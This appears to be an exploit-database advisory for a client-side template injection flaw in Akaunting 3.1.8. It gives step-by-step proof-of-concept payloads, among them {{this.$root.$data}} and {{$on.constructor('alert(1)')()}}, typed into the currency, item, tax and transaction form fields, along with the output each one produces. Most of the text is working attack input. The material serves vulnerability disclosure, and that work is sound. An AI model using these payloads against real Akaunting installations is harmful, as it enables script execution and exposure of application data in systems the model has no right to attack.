Akaunting version 3.1.8 suffers from a client-side template injection vulnerability.
# Exploit Title: Akaunting 3.1.8 - Client Side Template Injection CSTI
# Exploit Author: tmrswrr
# Date: 30/05/2024
# Vendor: https://akaunting.com/forum
# Software Link: https://akaunting.com/apps/crm
# Vulnerable Version(s): 3.1.8
1 ) Login with admin cred and go to : Currencies > New Currency
2 ) Write SSTI payload : {{ Object.keys(this) }} Name field
3 ) Save it
4 ) You will be see result :
"_uid", "_isVue",
"__v_skip", "_scope",
"$options", "_renderProxy",
"_self", "$parent",
"$root", "$children",
> {{ this.$root.$data }}
> "form": {},
"bulk_action": {
"path": "currencies",
"count": "",
"value": "*",
"message": "",
"type": "",
"show": false,
"modal": false,
"loading": false,
"selected": [],
> {{ Object.keys(this._self) }}
> "_uid",
> {{$on.constructor('alert(1)')()}}
> You will be see alert box
1 ) Login with admin cred and go to : Items > New Item
2 ) Write SSTI payload : {{7*7}} Name field , write Sale and Purchase Price random numbers
3 ) Save it
4 ) You will be see result :
1 ) Login with admin cred and go to :Settings > Taxes > New Tax
2 ) Write SSTI payload : {{7*7}} Name field , write Sale and Purchase Price random numbers
3 ) Save it
4 ) You will be see result :
> {{'a'.toUpperCase()}}
> A
> {{'a'.concat('b')}}
> ab
1 ) Login with admin cred and go to : Banking > Transactions > New Income
2 ) Write SSTI payload : {{7*7}} Description field
3 ) Save it
4 ) You will be see result :
> {{'a'.toUpperCase()}}
> A
> {{'a'.concat('b')}}
> ab
1 ) Login with admin cred
2 ) Write SSTI payload : {{7*7}} Name field
3 ) Save it
4 ) You will be see result :
> {{'a'.toUpperCase()}}
> A
> {{'a'.concat('b')}}
> ab
> {{self}}